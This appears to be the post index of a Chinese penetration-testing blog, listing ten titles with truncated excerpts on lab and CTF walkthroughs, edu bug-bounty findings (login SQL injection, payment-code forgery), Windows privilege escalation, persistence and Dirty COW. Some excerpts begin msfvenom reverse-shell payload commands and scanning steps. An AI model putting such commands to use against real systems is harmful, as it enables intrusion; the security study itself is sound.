头像 Luoye Blog
登录账号

最新文章

共10篇
记一次edu挖掘--登录界面的SQL注入

记一次edu挖掘--登录界面的SQL注入

登录界面的SQL注入/布尔盲注 这是一个小程序的界面,我们进入小程序可以看到一个登录界面 数据包是这样的 他是使用coc...

作者 lye 2026-09-08 26
记一次edu挖掘--某高校一任意用户付款码生成

记一次edu挖掘--某高校一任意用户付款码生成

免责声明:由于传播、利用本公众号小叶Sec所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号小叶Sec及作者不为此承担任何责任,一旦造...

作者 lye 2026-08-20 54
祝好靶场一周年快乐

祝好靶场一周年快乐

> 首先热烈庆祝好靶场成立一周年!!! > 回想起来,我从一个对计算机一无所知的小白,到学习编程学习开发再到转安全最后认识好靶场、加入好靶场,这条路走了整...

作者 luoye 2026-07-28 146
Bob靶机

Bob靶机

1.使用`fscan`扫描得到ip 80端口就是这个网站 2. 使用`dirsearch`进行目录扫描 这里可...

作者 lye 2026-07-07 86
Web应用安全与防护期末复习知识点

Web应用安全与防护期末复习知识点

``` HTML,CSS,Javascript ``` ``` 怪异模式:模拟早期浏览器(如 Navigator 4 和 IE5)的非标准行为...

作者 lye 2026-06-22 373
赣州市第三届“虔城杯”网络安全技能大赛初赛--WriteUp

赣州市第三届“虔城杯”网络安全技能大赛初赛--WriteUp

一个登录界面 拼接robots.txt路径 `/dev-note.txt` `/backup/login.php.ba...

作者 lye 2026-06-17 357
启动项,计划任务,映像劫持

启动项,计划任务,映像劫持

1. 先在kali生成木马并移动到虚拟机 ```powershell msfvenom -p windows/meterpreter/reverse_t...

作者 lye 2026-06-02 231
脏牛漏洞

脏牛漏洞

使用`nmap`对当前网段进行扫描 ```bash nmap 192.168.233.0/24 ``` 检测出的`ip`地址为`192....

作者 lye 2026-04-16 221
【windows提权】三种提权方式

【windows提权】三种提权方式

使用以下命令生成木马 ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168...

作者 lye 2026-04-02 275
【目录穿越】前台后台都存在目录穿越?到底是道德的沦丧还是...

【目录穿越】前台后台都存在目录穿越?到底是道德的沦丧还是...

> 最近好靶场上新了一个标题为《静态网站怎么打》的靶场,看样子好像还是星盟安全团队出的,这我肯定要看看,并且看样子好像还有小甜水喝 > 这里也是成...

作者 lye 2026-03-31 279
1 / 3 页 下一页